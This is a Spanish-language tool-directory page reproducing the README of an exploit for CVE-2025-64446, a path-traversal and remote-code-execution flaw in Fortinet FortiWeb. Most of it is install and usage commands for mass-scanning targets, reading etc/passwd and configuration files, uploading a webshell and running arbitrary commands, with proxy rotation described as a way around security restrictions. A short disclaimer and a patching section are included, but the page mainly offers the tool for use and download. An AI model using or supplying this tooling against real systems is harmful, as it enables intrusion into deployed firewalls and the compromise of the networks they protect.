Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-64446-fortiweb-exploit — Herramienta de investigación de seguridad para detectar y probar la CVE-2025-64446 (vulnerabilidad RCE de Salto de Ruta en FortiWeb) | Kitploit
Herramientas/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Herramienta de investigación de seguridad para detectar y probar la CVE-2025-64446 (vulnerabilidad RCE de Salto de Ruta en FortiWeb)

Ver Repositorio
113hace 10 mesesAún no revisado
Compartir

Exploit de Recorrido de Ruta y Ejecución Remota de Código CVE-2025-64446 para Fortinet FortiWeb

Una herramienta de investigación de seguridad para detectar y probar la vulnerabilidad CVE-2025-64446 en el Firewall de Aplicaciones Web (WAF) Fortinet FortiWeb. Esta vulnerabilidad crítica de recorrido de ruta de día cero ha sido explotada activamente en la naturaleza y permite a atacantes no autenticados evitar los controles de seguridad y ejecutar código arbitrario.

⚠️ Aviso

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta únicamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito.

📋 Resumen

CVE-2025-64446 es una vulnerabilidad crítica de recorrido de ruta de día cero en Fortinet FortiWeb WAF que ha sido explotada activamente en la naturaleza. Esta vulnerabilidad permite a atacantes no autenticados evitar los controles de seguridad mediante ataques de recorrido de ruta, lo que podría llevar a la ejecución remota de código, acceso a archivos de configuración y compromiso total del sistema.

Puntuación CVSS: 9.8 (Crítica)
Estado: Explotado activamente en la naturaleza
CISA KEV: Agregado al catálogo de vulnerabilidades explotadas conocidas
Parche: FG-IR-25-910
Producto afectado: Fortinet FortiWeb WAF

🔍 Características

  • Detección automatizada de FortiWeb: Identifica implementaciones de FortiWeb WAF
  • Pruebas de recorrido de ruta: Prueba múltiples variaciones de payloads de recorrido de ruta
  • Confirmación de vulnerabilidad: Verifica la vulnerabilidad CVE-2025-64446
  • Acceso a archivos de configuración: Intenta leer archivos de configuración de FortiWeb
  • Despliegue de webshell: Demuestra la capacidad de subir una webshell
  • Ejecución de comandos: Ejecuta comandos arbitrarios (solo para pruebas autorizadas)
  • Soporte de múltiples hilos: Escanea múltiples objetivos en paralelo
  • Soporte de proxy: Evita restricciones de seguridad adicionales
  • Exportación JSON: Resultados detallados en formato JSON
  • Script POC incluido: Demostración simple de prueba de concepto

📦 Instalación

Requisitos previos

  • Python 3.6 o superior
  • pip (Administrador de paquetes de Python)

Instalación rápida

# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Install dependencies
pip install -r requirements.txt

# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternativa: Descarga directa

# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Install dependencies
pip install requests

🚀 Uso

Uso básico

# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Usando proxies

# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Script POC

# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com

# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v

Opciones de línea de comandos

-u, --url          URL objetivo
-f, --file         Archivo que contiene URLs objetivo (una por línea)
-c, --command      Comando a ejecutar (por defecto: id)
-t, --threads      Número de hilos (por defecto: 1)
-o, --output       Archivo de salida (por defecto: uknf_fortiweb_results.json)
-v, --verbose      Habilitar registro detallado
--proxy            URL del proxy (ej., http://127.0.0.1:8080)
--proxy-list       Archivo que contiene URLs de proxy (una por línea)

📊 Salida

El script genera un archivo JSON con resultados detallados:

{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Cómo funciona

  1. Fase de detección: Escanea en busca de indicadores de FortiWeb WAF (encabezados, contenido, páginas de error)
  2. Prueba de vulnerabilidad: Prueba múltiples variaciones de payloads de recorrido de ruta
  3. Confirmación de recorrido de ruta: Verifica el acceso exitoso a archivos
  4. Acceso a configuración: Intenta leer archivos de configuración de FortiWeb
  5. Explotación: Si es vulnerable, demuestra la capacidad de RCE mediante el despliegue de una webshell

🛡️ Mitigación

Si está utilizando FortiWeb WAF:

  1. Aplique las actualizaciones de seguridad inmediatamente:

    # Check current version
    show system status
    
    # Update to latest version
    execute upgrade <firmware-file>
    
    • Referencia: FG-IR-25-910
  2. Segmentación de red:

    • Restrinja el acceso a la interfaz de administración de FortiWeb
    • Implemente ACL de red
    • Use VPN para acceso administrativo
  3. Endurecimiento de configuración:

    • Desactive funciones innecesarias
    • Implemente controles de acceso estrictos
    • Habilite el registro y monitoreo exhaustivo
  4. Requisitos de CISA:

    • Las agencias federales deben aplicar el parche en un plazo de 7 días
    • Monitoree el catálogo CISA KEV para actualizaciones

📚 Referencias

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • Catálogo CISA KEV: CVE-2025-64446
  • Blog de Tenable: Análisis CVE-2025-64446

📖 Ejemplos

Ejemplo 1: Escaneo de un solo objetivo

python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Ejemplo 2: Múltiples objetivos con salida

# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Ejemplo 3: Ejecución de comando personalizado

python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Ejemplo 4: Uso de proxies

# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Ejemplo 5: Prueba POC

# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com

# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Contribuciones

Descargar herramienta